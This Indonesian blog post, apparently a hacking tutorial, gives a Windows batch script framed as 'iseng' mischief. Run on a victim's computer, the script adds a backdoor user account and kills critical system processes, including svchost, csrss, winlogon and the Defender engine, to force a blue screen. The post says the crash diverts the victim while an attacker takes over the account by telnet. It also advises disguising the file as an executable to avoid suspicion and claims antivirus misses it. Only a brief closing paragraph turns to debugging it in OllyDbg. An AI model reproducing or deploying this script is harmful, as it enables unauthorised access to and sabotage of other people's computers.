Hello batch programming. Jenis bahasa pemrograman dasar di windows yang sudah lama tidak saya gunakan. Bahasa Batch Programming tergolong bahasa basic yang dapat dimengerti dengan mudah. Struktur command yang digunakan pun hampir sama dengan command yang digunakan pada command line cmd windows. Postingan kali ini saya tidak akan membahas secara detail mengenai pemrograman Batch, akan tetapi akan berusaha membuat sedikit scenario “iseng”, yang bertujuan untuk membuat sebuah fake user pada komputer target, kemudian langsung membuat komputer tersebut mengalami bluescreen. Untuk tahapan awal, buka terlebih dahulu aplikasi notepad (saya sarankan notepad++). Apabila aplikasi tersebut telah dijalankan, ketikkan script dibawah ini ke dalam notepad.

@echo off
:: Mengubah Warna Background dan Tulisan dari Command Line
Color 0A
:: Menampilkan Pesan pada command Line
Echo Hello Programming. Just Remind How Importants Its Security Computer
:: Membuat sebuah account victim pada komputer korban
net user victim $patusa$ /add
:: Membuat pesan pada sebuah file txt pada komputer korban
echo I’M sorry about that. Just practice how to use Batch Programming > readme.txt
:: Mematikan service yang berjalan pada windows sehingga bluescreen
tskill svchost
tskill explorer
tskill msseces
tskill System
tskill smss
tskill csrss
tskill wininit
tskill winlogon
tskill MsMpEng
pause

Setelah script tersebut ditulis pada notepad, save file ini dengan nama downloader.bat (namanya terserah anda dengan ekstensi.bat). Script tersebut sudah menjadi sebuah program yang apabila dieksekusi akan langsung menjalankan fungsinya seperti membuat sebuah user baru dan langsung menampilkan error blue screen pada windows. Tujuan menampilkan error blue screen disini hanyalah sebagai pengalihan perhatian korban, agar tidak menyadari bahwa komputer yang sedang dia gunakan sudah berhasil membuat sebuah account baru untuk di take over oleh attacker.  Untuk mengakali ekstensi program diatas sehingga tidak terlalu mencurigakan korban, kita bisa mengakalinya dengan bantuan software BAT to EXE converter atau menggunakan bantuan metasploit seperti postingan saya pada link ini.

Untuk melakukan remote terhadap komputer korban yang sudah dibuatkan sebuah account, dapat menggunakan layanan telnet ataupun jenis teknis\k remote lainnya.  File ini tidak terdeteksi oleh antivirus dikarenakan memang hanyalah sebuah program simple berfungsi membuat sebuah account dan mematikan service microsoft windows.

Mengantisipasi penyalahgunaan dari aplikasi ini cukuplah sulit, dikarenakan tidak terdeteksi oleh antivirus. Salah satu cara yang bisa dilakukan dengan melakukan analisis menggunakan software debugging seperti ollydbg. Dengan bantuan ini kita bisa mengetahui resource dan urutan pelaksanaan program. Untuk mendownload aplikasi Ollydbg dapat mengunduh dari link ini. Berikut tampilan ketika proses debugging program yang dihasilkan menggunakan software Ollydbg

Secara sekilas dapat dilihat pada line pertama aplikasi, program berusaha membuka aplikasi cmd. Hasil dari proses debugging ini menampilkan runutan bahasa pemrograman menggunakan bahasa assembly. Walaupun dengan bahasa yang berbeda, tapi urutan eksekusi program akan tetap sama denagn bahasa pemrograman asal aplikasi